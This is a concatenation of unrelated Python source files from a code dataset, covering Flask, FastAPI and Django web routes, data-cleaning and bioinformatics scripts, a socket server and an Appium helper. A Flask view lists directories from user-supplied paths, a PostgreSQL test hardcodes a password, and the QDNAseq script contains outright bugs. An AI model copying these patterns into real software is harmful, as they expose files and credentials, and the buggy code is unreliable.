\"application/static/product_images\"\n self.image_filename = f'{self.sku}.png'\n abs_path = os.path.join(script_dir, rel_path, self.image_filename)\n\n headers = {'User-agent': 'Mozilla/5.0'}\n res = requests.get(self.image_url, headers=headers).content\n with open(abs_path, 'wb') as f:\n f.write(res)\n\n def __repr__(self):\n return self.name\n","repo_name":"cyreilv7/BestBuyPriceTracker","sub_path":"application/bbwrapper/ProductInfo.py","file_name":"ProductInfo.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13087986064","text":"'''Implement table to store edge distance'''\nimport numpy as np\n\n\nclass NeighborTable:\n\n def __init__(self, num_points):\n self.tab = np.zeros(num_points, num_points, 2) - 1\n # store current nearest edge and its distance\n self.current_nearest = ([-1, -1], -1)\n\n def _check_edge(self, edge):\n if not isinstance(edge, tuple):\n raise TypeError('expect to be a tuple.')\n if len(edge) != 2:\n raise TypeError('expect to have 2 entries.')\n if edge[0] > edge[1]:\n return edge\n return (edge[1], edge[0])\n\n def get(self, edge):\n edge = self._check_edge(edge)\n return self.tab[edge[0], edge[1]]\n\n def set(self, edge, dist, lb):\n edge = self._check_edge(edge)\n self.tab[edge[0], edge[1], 0] = dist\n self.tab[edge[0], edge[1], 1] = lb\n","repo_name":"wagner-group/geoadex","sub_path":"lib/dist_tab.py","file_name":"dist_tab.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"5045999822","text":"\n\nfrom flask import current_app, g, redirect, render_template, request, session\nfrom healthcheck import HealthCheck\n\nfrom . import homepage_blueprint\n\nimport json\nfrom bson import json_util\n\nfrom test_lib.data.model.user import create_test_users, get_users\nfrom test_lib.flask import force_scheme\nfrom test_lib.flask.login import do_login\nfrom test_lib.util.dependency_statuses import flask_available, mongo_available\nfrom test_lib.util.files import list_dirs_files\n\nimport os, sys\n\n# relative to this file(!)\nPROJECT_ROOT = os.path.abspath(os.path.abspath(__file__)+'../../../../../')\n\n\n@homepage_blueprint.route('/')\ndef homepage():\n return render_template('homepage.html')\n \n\n@force_scheme('https')\n@homepage_blueprint.route('login', methods=['GET', 'POST'])\ndef login():\n\tcreate_test_users(request.db)\n\tif request.method=='POST':\n\t\tuser = do_login(\n\t\t\trequest.form.get('username'), \n\t\t\trequest.form.get('password')\n\t\t)\n\t\tif not user:\n\t\t\treturn json.dumps({'success': False})\n\t\treturn json.dumps({'success': True})\n\treturn render_template('login.html')\n\n\n@homepage_blueprint.route('logout', methods=['GET'])\ndef logout():\n\tsession.clear()\n\treturn redirect('/')\n\n\n@force_scheme('https')\n@homepage_blueprint.route('users', methods=['GET'])\ndef list_users():\n\tcity = request.args.get('city', None)\n\tordered_by = request.args.get('ordered_by', None)\n\tusers = get_users(request.db, city, '%s'%ordered_by)\n\treturn render_template(\n\t\t'users.html',\n\t\tusers=users,\n\t\tcity=city,\n\t\tordered_by=ordered_by\n\t)\n\n\n@force_scheme('https')\n@homepage_blueprint.route('files', methods=['GET', 'POST'])\ndef list_files():\n\tpath = str(request.form.get('path', '')) if request.method=='POST' \\\n\telse str(request.args.get('path', ''))\n\tfiles = []\n\tif path:\n\t\tif not path[0]=='/':\n\t\t\tpath = '/%s'%path\n\t\tfiles = list_dirs_files(path, PROJECT_ROOT)\n\t\tif not files:\n\t\t\tif request.method=='POST':\n\t\t\t\treturn json.dumps({'success':True, 'ret': 'No such folder or empty'})\n\t\t\t\tfiles = []\n\t\tif request.method=='POST':\n\t\t\treturn json.dumps({'success':True, 'ret':files})\n\treturn render_template(\n\t\t'list_files.html',\n\t\tret=files,\n\t\tfile_scope=PROJECT_ROOT\n\t)\n\n\n# set healthcheck URL\nfrom dotcom import app\nhealth = HealthCheck(app, \"/statuses\")\nhealth.add_check(mongo_available)\nhealth.add_check(flask_available)\n\n\n","repo_name":"ddilley/technicolor-test","sub_path":"dotcom/blueprints/homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20240927405","text":"from src.ballandhoop.videostream import VideoStream\nimport shutil\nimport os\nimport cv2\n\n\ndef savePictures(dir_name, amount: int = 10, fps: int = 60, resolution_no: int = 1, wb_gains=None):\n \"\"\"\n Saves multiple video like images with ascending file names in a given folder, starting with 0.png\n :param str dir_name: name of the (new) directory inside `storage/faker/`, directory will be cleared out at the start\n :param amount: amount of pictures taken\n :param fps: the framerate in which the video frames will be fetched\n :param resolution_no: the resolution number which will be used, see :py:property`VideoStream.resolutions`\n :param wb_gains: the gains for white balancing, see :py:class`VideoStream`\n :return:\n \"\"\"\n dir_base = \"storage/faker/\"\n dir_name = dir_base + dir_name + \"/\"\n if os.path.exists(dir_name):\n shutil.rmtree(dir_name)\n os.makedirs(dir_name)\n\n vid = VideoStream(resolution_no=int(resolution_no), framerate=int(fps), wb_gains=wb_gains, as_hsv=False)\n idx = 0\n buffer = []\n for frame in vid:\n buffer.append(frame)\n idx = idx + 1\n if idx > int(amount):\n break\n vid.close()\n print('Got ' + str(int(vid.fps.fps())) + \" fps in \" + str(vid.fps.elapsed()) + \"s\")\n for i, f in enumerate(buffer):\n # this function can be too slow for doing it inside the top loop (?)\n cv2.imwrite(dir_name + str(i) + '.png', f)\n","repo_name":"lukas-staab/ball-and-hoop","sub_path":"src/faker/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37841331025","text":"# Takes in either a folder name, or individual .en and .[src] files.\n# Performs the following:\n# 1. normalizes punctuation\n# 2. removes lines where the English text is non-ASCII\n# 3. (optional) finds the longest common substring (LCS) of en and src sentences, and remove those\n# where LCS ratio to sentence length is too high.\n# Outputs en_clean and src_clean files.\n\n\nimport argparse\nfrom difflib import SequenceMatcher\nfrom pathlib import Path\nfrom string import punctuation\n\nfrom download_wikimatrix import extract_l2\nimport normalize\n\nPUNCT = set(punctuation)\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--en', type=Path)\nparser.add_argument('--src', type=Path)\nparser.add_argument('--folder', type=Path, help='run on all .[src] & .en files in a folder')\nparser.add_argument('--lang_fam', type=Path, default=None)\nparser.add_argument('--lcs-thresh', type=float, default=0.0,\n help='If specified, filters out those pairs with LCS > threshold. '\n 'For dev/test, recommended to set to 0.8')\n\ndef clean_en(en, src, en_clean, src_clean, lf=None, lf_clean=None, lcs_thresh=0.0):\n normalizer = normalize.MosesPunctNormalizer()\n\n num_lines_orig = 0\n num_lines_clean = 0\n num_bad_ascii = 0\n num_bad_lcs = 0\n\n if lf and lf_clean:\n flf = lf.open('r')\n flfclean = lf_clean.open('w')\n\n with en.open('r') as fen, src.open('r') as fsrc, \\\n en_clean.open('w') as fenclean, src_clean.open('w') as fsrcclean:\n for line_en, line_src in zip(fen, fsrc):\n num_lines_orig += 1\n if (num_lines_orig % 1000) == 0:\n print(f'processing line {num_lines_orig}', end='\\r')\n\n line_src = normalizer.normalize(line_src)\n line_en = normalizer.normalize(line_en)\n if lf:\n line_lf = flf.readline()\n\n if not line_en.isascii():\n num_bad_ascii += 1\n continue\n\n if lcs_thresh > 0:\n match = SequenceMatcher(None, line_en, line_src, autojunk=False).find_longest_match(\n 0, len(line_en), 0, len(line_src))\n lcs = line_src[match.b: match.b + match.size]\n lcs_ratio = len(lcs) / min(len(line_en), len(line_src))\n if lcs_ratio > lcs_thresh:\n num_bad_lcs += 1\n continue\n\n fenclean.write(line_en + '\\n')\n fsrcclean.write(line_src + '\\n')\n\n if lf:\n flfclean.write(line_lf)\n\n num_lines_clean += 1\n\n if lf and lf_clean:\n flf.close()\n flfclean.close()\n\n return num_lines_orig, num_lines_clean, num_bad_ascii, num_bad_lcs\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n lf, lf_clean = args.lang_fam, None\n lcs_thresh = args.lcs_thresh\n\n if args.folder:\n contents = list(args.folder.glob('WikiMatrix.??-??.txt.??'))\n basenames = set(fname.name.rsplit('.', 2)[0] for fname in contents)\n srcs, ens = [], []\n for basename in basenames:\n l2 = extract_l2(basename)\n srcs.append(args.folder / f'{basename}.txt.{l2}')\n ens.append(args.folder / f'{basename}.txt.en')\n\n out_folder = args.folder.parent / f'{args.folder.name}_clean'\n out_folder.mkdir(exist_ok=True, parents=True)\n else:\n ens = [args.en]\n srcs = [args.src]\n\n if lf:\n lf_clean = lf.parent / lf.name.replace('Matrix.', 'Matrix.clean2.')\n\n for en, src in zip(ens, srcs):\n if args.folder:\n en_clean = out_folder / en.name\n src_clean = out_folder / src.name\n else:\n en_clean = en.parent / en.name.replace('Matrix.', 'Matrix.clean.')\n src_clean = src.parent / src.name.replace('Matrix.', 'Matrix.clean.')\n\n\n print('cleaning...')\n num_lines_orig, num_lines_clean, num_bad_ascii, num_bad_lcs = \\\n clean_en(en, src, en_clean, src_clean, lf, lf_clean, lcs_thresh)\n print(f'num lines originally: {num_lines_orig}')\n print(f'num lines after cleaning: {num_lines_clean}')\n print(f'removed non-ASCII: {num_bad_ascii}')\n print(f'removed overlapping: {num_bad_lcs}')\n print(f'saved to {en_clean} , {src_clean}')\n","repo_name":"manestay/EcXTra","sub_path":"src/zsmt/scripts/clean_wikimatrix.py","file_name":"clean_wikimatrix.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4655199214","text":"#Email:fanyucai1@126.com\n#2019.3.20\n\nimport argparse\nimport os\nimport subprocess\nimport math\n\nqsub=\"/home/fanyucai/bin/qsub_sge.pl\"\n#download from:http://genome.ucsc.edu/cgi-bin/hgFileUi?db=hg19&g=wgEncodeMapability\nbigWigFile=\"/software/QDNAseq/wgEncodeCrgMapabilityAlign50mer.bigWig\"\nbigWigAverageOverBed=\"/software/ucsc-tools/bigWigAverageOverBed\"\nbacklist=[]\nbacklist[0]=\"/software/QDNAseq/wgEncodeDacMapabilityConsensusExcludable.bed\"\nbacklist[1]=\"/software/QDNAseq/wgEncodeDukeMapabilityRegionsExcludable.bed\"\nbin_file=\"/software/QDNAseq\"\nR=\"/software/R/R-v3.5.2/bin\"\n\nparser=argparse.ArgumentParser(\"\")\nparser.add_argument(\"--bam_dir\",help=\"directory contains bam file\",required=True)\nparser.add_argument(\"--bin\",help=\"bin size\",required=True,choices=[1,5,10,15,30,50,100,500,1000])\nparser.add_argument(\"-o\",\"--outdir\",help=\"output directory\",required=True)\nargs=parser.parse_args()\n\nfor i in range(len(args.bam)):\n args.bam[i]=os.path.abspath(args.bam[i])\nif not os.path.exists(args.outdir):\n os.mkdir(args.outdir)\n#########################################Generating bin annotations\nshell=open(\"%s/QDNAseq.Rscript\" %(args.outdir),\"w\")\nshell.write(\"#!%s/Rscript\" %(R))\nshell.write(\"library(QDNAseq)\")\nshell.write(\"library(Biobase)\")\nshell.write(\"library(BSgenome.Hsapiens.UCSC.hg19)\")\nshell.write(\"bins <- getBinAnnotations(binSize=%s,path=\\'%s\\',genome=\\\"hg19\\\")\" %(args.bin,bin_file))\nshell.write(\"readCounts=binReadCounts(bins, path=\\'%s\\')\" %(args.bam_dir))\nshell.write(\"readCountsFiltered=applyFilters(readCounts,residual=TRUE, blacklist=TRUE)\")\n#Calculating GC content and mappability\nshell.write(\"readCountsFiltered= estimateCorrection(readCountsFiltered)\")\n#apply the correction for GC content and mappability\nshell.write(\"copyNumbers = correctBins(readCountsFiltered)\")\n#median normalization\nshell.write(\"copyNumbersNormalized = normalizeBins(copyNumbers)\")\nshell.write(\"copyNumbersSmooth =smoothOutlierBins(copyNumbersNormalized)\")\nshell.write(\"exportBins(copyNumbersSmooth, file=\\\"$%/counts.txt\\\")\" %(args.outdir))\nshell.close()\n#########################################\nsubprocess.check_call(\"%s/Rscript %s/QDNAseq.Rscript\" %(R),shell=True)\n#########################################\ninfile=open(\"%s/counts.txt\" %(args.outdir),\"r\")\noutfile=open(\"%s/counts_log2.txt\")\noutfile.write(\"chromosome\\tstart\\tend\\tusebin\")\ni=-1;\nfor line in infile:\n line = line.strip()\n list = line.split(\"\\t\")\n i+=1\n if i==1:\n outfile.write(\"%s\\t%s\\t%s\\tusebin\" % (list[1],list[2],list[3]))\n for i in range(4,len(list)):\n outfile.write(\"\\t%s\" %(list[i]))\n outfile.write(\"\\n\")\n else:\n outfile.write(\"%s\\t%s\\t%s\\tTRUE\" % (list[1], list[2], list[3]))\n for i in range(4,len(list)):\n outfile.write(\"\\t%s\" %(list[i]))\n outfile.write(\"\\n\")\ninfile.close()\noutfile.close()\n","repo_name":"fanyucai1/script","sub_path":"QDNAseq.py","file_name":"QDNAseq.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41567559541","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', include('landing.urls')),\n # url(r'^blog/', include('blog.urls')),\n url(r'^register/', include('registration.urls')),\n url(r'^process/', include('process.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^id/', include('getId.urls')),\n url(r'^summary/(?P\\w{10})/glass', 'process.views.glass'),\n url(r'^summary/(?P\\w{10})/', 'process.views.summary'),\n url(r'^login/', 'registration.views.login_user'),\n url(r'^logout/', 'registration.views.logout_user'), \n url(r'^contact/', 'contactUs.views.contactUs')\n)\n","repo_name":"nfarve/MoveYourGlass","sub_path":"moveyourglass/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35958774883","text":"import socket\n\nimport sys\n\nfrom core.serverThread import ServerThread\n\n\nclass ServerManager:\n def __init__(self, port, thread_count, document_root):\n\n self.port = int(port)\n self.thread_count = int(thread_count)\n self.document_root = document_root\n\n self.threads = []\n\n def get_step_function(self, i):\n def step(index):\n return i + self.thread_count*index\n return step\n\n def run(self):\n stepper = self.get_step_function(0)\n stepper2 = self.get_step_function(1)\n\n tcpServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcpServer.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n tcpServer.bind(('0.0.0.0', self.port))\n tcpServer.listen(self.thread_count)\n # tcpServer.setblocking(False)\n\n try:\n for i in range(0, self.thread_count):\n print('spawning thread', i)\n thread = ServerThread(tcpServer, self.document_root, self.get_step_function(i))\n self.threads.append(thread)\n thread.start()\n except KeyboardInterrupt:\n sys.exit()\n\n for i in range(0, self.thread_count):\n self.threads[i].join()\n\n","repo_name":"SkynetHackPro/highload","sub_path":"core/serverManager.py","file_name":"serverManager.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34499466081","text":"import string\n\nletter_map = {}\nlower_case_list = list(string.ascii_lowercase)\n\ndef rotate_letter(letter, n):\n mini_map = letter_map.setdefault(letter, {})\n letter_index = lower_case_list.index(letter)\n return mini_map.setdefault(n, lower_case_list[(letter_index + n) % 26])\n\ndef rotate_word(word, n):\n result = ''\n for letter in word:\n result += rotate_letter(letter, n)\n return result\n\ndef rotate_pair(word, word_dicts):\n for i in range(1,14):\n rotated_word = rotate_word(word, i)\n if rotated_word in word_dicts:\n print(word, \"-\", rotated_word)\n\ndef make_words_dict():\n words_dict = {}\n fin = open('words.txt')\n for line in fin:\n word = line.strip()\n words_dict[word] = 0\n return words_dict\n\nif __name__ == \"__main__\":\n words_dict = make_words_dict()\n for word in words_dict:\n rotate_pair(word, words_dict)\n #for i in range(1, 14):\n # print(\"Rotate {} to {}\".format(\"zoo\", rotate_word(\"zoo\", i)))\n","repo_name":"pirent/python-playground","sub_path":"thinkpython/exercise1105.py","file_name":"exercise1105.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21642239955","text":"from typing import List, Optional, Union\nfrom fastapi import FastAPI\nimport crud_ops\nimport filters\nimport utils\n\napp = FastAPI()\n\n@app.get('/', status_code=200)\ndef home() -> dict:\n return {\"message\": \"This is the Home page\", \"status_code\": 200}\n\n\n@app.get('/records', status_code=200)\ndef get_sports_records() -> Union[List[dict], List]:\n df_records = crud_ops.get_sports_records()\n records = utils.dataframe_to_list(df=df_records)\n return records\n\n\n@app.get('/record', status_code=200)\ndef get_sports_record(id_: str) -> dict:\n dict_record = crud_ops.get_sports_record(id_=id_)\n return dict_record\n\n\n@app.get('/records/filter', status_code=200)\ndef filter_sports_records(id_: Optional[str] = None,\n name: Optional[str] = None,\n name__contains: Optional[str] = None,\n age: Optional[int] = None,\n fav_sport: Optional[str] = None,\n min_age: Optional[int] = None,\n max_age: Optional[int] = None) -> Union[List[dict], List]:\n records = filters.filter_sports_records(id_=id_,\n name=name,\n name__contains=name__contains,\n age=age,\n fav_sport=fav_sport,\n min_age=min_age,\n max_age=max_age)\n return records\n\n\n@app.put('/record/update', status_code=201)\ndef update_sports_record(id_: str,\n name: Optional[str] = None,\n age: Optional[int] = None,\n fav_sport: Optional[str] = None) -> dict:\n crud_ops.update_sports_record(id_=id_, name=name, age=age, fav_sport=fav_sport)\n response = {\"message\": \"Record was updated successfully\", \"status_code\": 201}\n return response\n\n\n@app.post('/record/add', status_code=201)\ndef add_sports_record(name: str, age: int, fav_sport: str) -> dict:\n crud_ops.add_sports_record(name=name, age=age, fav_sport=fav_sport)\n response = {\"message\": \"Record was added successfully\", \"status_code\": 201}\n return response\n\n\n@app.delete('/record/delete', status_code=200)\ndef delete_sports_record(id_: str) -> dict:\n crud_ops.delete_sports_record(id_=id_)\n response = {\"message\": \"Record was deleted successfully\", \"status_code\": 200}\n return response","repo_name":"Nishant173/first-fastapi","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29709732874","text":"def validar_string(pergunta,min,max):\n x = input('Digite uma frase:')\n tam = len(x)\n while tam < min or tam > max:\n x = input('Digite uma frase:')\n break # Usei esse break para nao ter um loop infinito na string\n return x\n\n#Programa Principal\nx = validar_string('Digite uma frase',0,9) # Aqui se o tamanho min e o max da string\nprint('Voce digitou ---> {}'.format(x))\n","repo_name":"Alesal2021/Rotina","sub_path":"Validar uma string.py","file_name":"Validar uma string.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33368630435","text":"import PyDIP as dip\nimport cbor2\nfrom skimage import io\nimport cv2\nimport PIL\nimport numpy as np\n\nimg = dip.ImageReadTIFF('NucleiLabels.tif') \nchain_codes = dip.GetImageChainCodes(img)\nprint(\"Nuclei found:\", len(chain_codes))\ncentroids = []\nfor c in chain_codes:\n centroids.append(c.Polygon().Centroid())\n\ncentroids = np.asarray(centroids)\n\nnuclei_data = {'xPositions': tuple(centroids[:, 0]), 'yPositions': tuple(centroids[:, 1])}\n\nwith open('nuclei.cbor', 'wb') as fp:\n cbor2.dump(nuclei_data, fp)\n \nim = io.imread('NucleiLabels.tif')\n\nim[im > 0] = 255\nim[im <= 0] = 0\nim = im.astype(np.uint8)\n\nPIL.Image.fromarray(im).save('mask.png')\n","repo_name":"luminosuslight/pathology-ml-model-training","sub_path":"server/convert_label_image_to_centroids_and_mask.py","file_name":"convert_label_image_to_centroids_and_mask.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13230792782","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport argparse\n\nimport virtbmc.utils as utils\nfrom virtbmc.version import version\nfrom virtbmc import models\nfrom virtbmc import manager\n\n\ndef init_argparser():\n parser = argparse.ArgumentParser(\n prog='qemu-vbmc',\n description='%(prog)s Qemu virtual BMC simulation tool',\n )\n parser.add_argument(\"-v\", \"--version\", help=\"Show version\",\n action='version', version='%(prog)s'+' %s' % version())\n\n subparsers = parser.add_subparsers(help='commands')\n\n # Options shared by all subparsers\n parent_parser = argparse.ArgumentParser(add_help=False)\n parent_parser.add_argument(\"-d\", \"--verbose\", help=\"increase output verbosity\",\n action=\"store_true\")\n\n # Database\n db_parser = subparsers.add_parser(\n 'db', parents=[parent_parser],\n help='Database management',\n )\n db_parser.add_argument('--init', action='store_true', help='Init sqlite database')\n db_parser.add_argument('--remove', action='store_true', help='Remove sqlite database')\n db_parser.set_defaults(func=models.manage)\n\n # Create\n create_parser = subparsers.add_parser(\n 'create', parents=[parent_parser],\n help='Create VMs with BMC',\n )\n create_parser.add_argument(\"-u\", \"--ipmi-user\", help=\"ipmi user\")\n create_parser.add_argument(\"-p\", \"--ipmi-password\", help=\"ipmi password\")\n create_parser.add_argument(\"-n\", \"--number\", type=int, default=0,\n help=\"start virtual qemu bmc of a given number\")\n create_parser.add_argument(\"--image-size\", type=str, dest='image_size',\n default='20G', help=\"specified image size used by qemu/kvm\")\n create_parser.add_argument(\"-b\", \"--bridge\", type=str, default='br0',\n help=\"bridge interface name\")\n create_parser.add_argument(\"--qemu\", type=str, default='/opt/qemu2.7/bin/qemu-system-x86_64',\n help=\"qemu binary execute path\")\n create_parser.add_argument(\"--ipmi-sim\", type=str, dest=\"ipmi_sim\",\n default='/opt/openipmi/bin/ipmi_sim', help=\"ipmi-sim binary execute path\")\n create_parser.add_argument(\"--memory\", type=int, default=4096,\n help=\"qemu VM memory size\")\n create_parser.add_argument(\"--ncpu\", type=int, default=1,\n help=\"qemu VM cpu number\")\n create_parser.add_argument(\"--template\", type=str, default=utils.dirname(__file__, 1)+os.sep+'templates',\n help=\"template scripts dirpath\")\n create_parser.set_defaults(func=manager.create)\n\n # Start\n start_parser = subparsers.add_parser(\n 'start', parents=[parent_parser],\n help='Start VMs with BMC',\n )\n start_parser.add_argument(\"bmc\", nargs='+',\n help=\"start BMC, default start all\")\n start_parser.add_argument(\"--vm\", dest='autostart_vm',\n help=\"autostart qemu vm when BMC run\",\n action=\"store_true\")\n start_parser.set_defaults(func=manager.start)\n\n # List\n list_parser = subparsers.add_parser(\n 'list', parents=[parent_parser],\n help='List VMs',\n )\n list_parser.add_argument(\"--json\", help=\"json output\",\n action=\"store_true\")\n list_parser.set_defaults(func=manager.list_all)\n\n # Update\n update_parser = subparsers.add_parser(\n 'update', parents=[parent_parser],\n help='Update VMs',\n )\n update_parser.add_argument('id', nargs='+',\n help='Update specify BMCs')\n update_parser.add_argument(\"-u\", \"--ipmi-user\", help=\"ipmi user\")\n update_parser.add_argument(\"-p\", \"--ipmi-password\", help=\"ipmi password\")\n update_parser.add_argument(\"--json\", help=\"json output\",\n action=\"store_true\")\n update_parser.set_defaults(func=manager.update)\n\n # Delete\n delete_parser = subparsers.add_parser(\n 'delete', parents=[parent_parser],\n help='Delete Vm',\n )\n delete_parser.add_argument('id', nargs='+',\n help='Delete specify BMCs')\n delete_parser.set_defaults(func=manager.delete)\n\n # Stop\n stop_parser = subparsers.add_parser(\n 'stop', parents=[parent_parser],\n help='Stop BMCs & Vms',\n )\n stop_parser.add_argument(\"id\", nargs='+',\n help=\"stop specify BMCs & Vms\")\n stop_parser.set_defaults(func=manager.stop)\n\n return parser\n\n\ndef check_args(parser):\n\n def error_exit(msg):\n parser.print_help()\n sys.exit(msg)\n\n args = parser.parse_args()\n return parser, args\n\n\n_opt_parser = None\n_args = None\n\n\ndef get_parser():\n return _opt_parser\n\n\ndef get_args():\n return _args\n\n\ndef init():\n global _opt_parser\n global _args\n if not _opt_parser or not _args:\n _opt_parser, _args = check_args(init_argparser())\n","repo_name":"zexi/vbmc-qemu","sub_path":"virtbmc/optparse.py","file_name":"optparse.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"73037160427","text":"import random\nimport threading\nimport time\n\nimport threadpool\nimport psycopg2\n\ntmp = []\n\n\ndef select():\n s = \"select * from student where student_name = '李谢恩';\"\n connection = psycopg2.connect(database='db_project1', user='lee', password='buzz10161', host='localhost',\n port=5432)\n con = connection.cursor()\n start = time.time()\n con.execute(s)\n connection.commit()\n con.fetchone()\n end = time.time()\n con.close()\n connection.close()\n tmp.append((end - start))\n\n\nif __name__ == '__main__':\n threads = []\n for i in range(1, 501):\n threads.append(threading.Thread(target=select()))\n for t in threads:\n t.start()\n tt = 0\n for i in tmp:\n tt = tt + i\n print('Average time: ' + str(round((tt / 100), 4)))\n","repo_name":"Buzzy0423/SUSTECH_UG_Resource","sub_path":"CS307_Database/DB_project1_py/High_concurrency.py","file_name":"High_concurrency.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7049664991","text":"import random\nimport time\n\nhigher_vals = [] #Store all values that are higher than the number\nlower_vals = [] #Store all values that are lower than the number\nlower_vals.append(int (input ( \"Valor mínimo:\")))\nhigher_vals.append(int (input ( \"Valor máximo:\")))\nattempt = int((higher_vals[0]-lower_vals[0])/2)\ntries = 1\nprint(\"Think about a secret number, I'll guess it\")\nprint(\"Is it \"+ str(attempt)+\"?\")\nuser_inp = input()\nwhile user_inp != \"same\":\n if user_inp == \"higher\":\n print(\"in high\")\n lower_vals.append(attempt)\n attempt = attempt + int((higher_vals[-1]-lower_vals[-1])/2)\n else:\n print(\"in low\")\n higher_vals.append(attempt)\n attempt = attempt - int((higher_vals[-1]-lower_vals[-1])/2)\n print(\"Is it \"+ str(attempt)+\"?\")\n user_inp = input()\n tries +=1\nprint(\"Nice, attempted: \"+str(tries)+ \" times.\")","repo_name":"cifpfbmoll/practica-6-python-MASACR99","sub_path":"exercise6.12.py","file_name":"exercise6.12.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16216488283","text":"# -*- coding: UTF-8 -*-\nimport os\nimport socket\nimport subprocess\nimport time\nimport traceback\nfrom os.path import dirname, abspath\n\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom common import config\nfrom common.logger import logger\n\n\nclass APP:\n def __init__(self):\n self.driver = None\n self.caps = {}\n self.port = '4723'\n\n def runCMD(self,command):\n \"\"\"\n 命令前加\"start /b \"则不显示命令窗口;命令前加\"cmd /c start \"则显示命令窗口\n :param command:\n :return:\n \"\"\"\n # os.popen('cmd /c start ' + command)\n p = subprocess.Popen('cmd /c start ' + command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n p.wait()\n # os.system(command)\n logger.info('运行cmd命令:' + str('start /b ' + 'cmd /c start ' + command) + '成功')\n\n def openAppium(self,port='4723'):\n self.port = port\n self.caps = {}\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.connect(('127.0.0.1', int(port)))\n s.shutdown(2)\n logger.error('port %s is uesd !' % port)\n portstatus = False\n except:\n logger.info('port %s is available!' % port)\n portstatus = True\n bootstrap_port = str(int(port) + 1)\n dir_path = dirname(dirname(abspath(__file__)))\n logPath = dir_path + \"/lib/logs/AppiumLog.log\";\n try:\n if portstatus:\n cmd = 'cmd /c start appium -a ' + '127.0.0.1 -p ' + str(port) + ' --bootstrap-port ' + str(bootstrap_port) + \" --log \" + logPath + \" --log-timestamp --local-timezone\"\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n logger.info('运行cmd命令:' + str('start /b ' + cmd) + '成功')\n p.wait()\n except Exception as e:\n logger.info('运行cmd命令:' + str('start /b ' + cmd) + '失败')\n logger.error(str(e))\n\n def openPackage(self,deviceName = \"7555\",appPackage = \"com.android.browser\",appActivity = \".BrowserActivity\"):\n config.get_config('../lib/conf/conf.properties')\n self.caps = {}\n self.caps[\"deviceName\"] = config.config['deviceName' + deviceName]\n self.caps[\"platformName\"] = config.config['platformName' + deviceName]\n self.caps[\"platformVersion\"] = config.config['platformVersion' + deviceName]\n self.caps[\"appPackage\"] = appPackage\n self.caps[\"appActivity\"] = appActivity\n self.caps[\"noReset\"] = True\n # 下面chromeOptions的添加很重要,涉及小程序的能否定位\n if appPackage == 'com.tencent.mm':\n self.caps['chromeOptions'] = {'androidProcess': 'com.tencent.mm:appbrand0'}\n elif appPackage == 'com.tencent.mobileqq':\n self.caps['chromeOptions'] = {'androidProcess': 'com.tencent.mobileqq:mini'}\n else:\n pass\n self.driver = webdriver.Remote(\"http://127.0.0.1:\" + self.port + \"/wd/hub\", self.caps)\n self.driver.implicitly_wait(30)\n logger.info('使用设备:' + config.config['deviceName' + deviceName] + '打开应用:' + appPackage + '成功')\n\n def visitH5(self,url,deviceName = \"7555\",browserName = \"Browser\"):\n config.get_config('../lib/conf/conf.properties')\n self.caps = {}\n self.caps[\"deviceName\"] = config.config['deviceName' + deviceName]\n self.caps[\"platformName\"] = config.config['platformName' + deviceName]\n self.caps[\"platformVersion\"] = config.config['platformVersion' + deviceName]\n self.caps[\"browserName\"] = browserName\n self.caps[\"noReset\"] = True\n self.driver = webdriver.Remote(\"http://127.0.0.1:\" + self.port + \"/wd/hub\", self.caps)\n self.driver.implicitly_wait(30)\n self.driver.get(url)\n if browserName == 'chrome':\n try:\n 